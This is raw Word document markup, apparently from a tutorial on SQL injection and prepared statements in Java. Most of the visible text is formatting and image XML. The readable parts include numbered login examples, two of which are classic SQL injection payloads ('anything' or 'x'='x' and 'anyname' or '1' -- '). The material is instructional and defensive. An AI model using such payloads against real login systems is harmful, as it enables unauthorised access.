        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000063">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attacker attempts to give a value to the userID and password field that is not a simple string,  then pstmt.setString() will throw a SQLException error rather than permitting the query to complete.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000064">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="240" w:before="240" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="313131"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="313131"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5610225" cy="2952750"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1" name="image7.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image7.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:srcRect b="0" l="4807" r="801" t="11680"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="56102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after="240" w:before="240" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="313131"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="313131"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="6011206" cy="1814513"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="8" name="image4.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image4.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:srcRect b="37037" l="4967" r="0" t="11965"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6011206"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313131"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                                                                                                     </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="313131"/>
          <w:shd w:fill="f4f4f4" w:val="clear"/>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700" w:line="240" w:lineRule="auto"/>
        <w:rPr>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Examples</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="0b5394"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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7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username: abcd       password: anything' or 'x'='x </w:t>
      </w:r>
    </w:p>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700" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5643563" cy="3174504"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6"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643563" cy="317450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700" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>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700" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. username:  Correct Username     password:  Wrong Password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006C">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="240" w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="313131"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5734050" cy="1320800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4" name="image4.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image4.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:srcRect b="49572" l="4967" r="0" t="11965"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="573405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700" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>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700" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. username: anyname' or '1' -- '       password: anything</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>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700" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3340100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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700" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>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700" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4. username:   Correct Username     password: Correct Password</w:t>
      </w:r>
    </w:p>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700" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5324475" cy="2238375"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="10" name="image5.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image5.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:srcRect b="21652" l="9455" r="961" t="11396"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="53244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2.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dev.mysql.com/downloads/connecto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